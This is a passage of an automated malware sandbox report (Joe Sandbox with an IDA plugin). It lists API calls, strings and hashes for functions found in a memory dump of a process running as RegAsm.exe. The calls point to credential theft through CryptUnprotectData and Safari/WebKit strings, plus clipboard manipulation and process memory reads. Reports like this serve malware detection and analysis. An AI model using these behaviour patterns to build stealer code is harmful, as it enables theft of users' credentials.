                                                                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                                                • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1213725291-0
                                                                                                                                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                • free.MSVCRT ref: 00418370
                                                                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                • API String ID: 2360000266-2664311388
                                                                                                                                                                                                • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2628231878-0
                                                                                                                                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: NtdllProc_Window
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4255912815-0
                                                                                                                                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                • API String ID: 2257402768-1134094380
                                                                                                                                                                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
